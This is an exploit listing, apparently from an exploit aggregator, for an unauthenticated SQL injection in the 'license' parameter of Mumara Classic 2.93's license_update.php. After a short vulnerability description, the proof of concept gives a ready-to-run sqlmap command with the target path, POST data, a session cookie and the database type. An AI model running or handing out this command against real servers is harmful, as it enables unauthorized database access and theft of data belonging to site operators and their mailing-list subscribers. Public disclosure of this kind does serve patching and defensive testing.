Exploit for Mumara Classic 2.93 SQL Injection

Name: Exploit for Mumara Classic 2.93 SQL Injection
Rating: 5 (346 reviews)

2021-11-12 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:164947
# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)  
# Date: 2021-11-11  
# Exploit Author: (v0yager) Shain Lakin  
# Vendor Homepage: https://mumara.com  
# Version: <= 2.93  
# Tested on: CentOS 7  
  
-==== Vulnerability ====-  
  
An SQL injection vulnerability in license_update.php in Mumara Classic  
through 2.93 allows a remote unauthenticated attacker to execute  
arbitrary SQL commands via the license parameter.  
  
-==== POC ====-  
  
Using SQLMap:  
  
sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql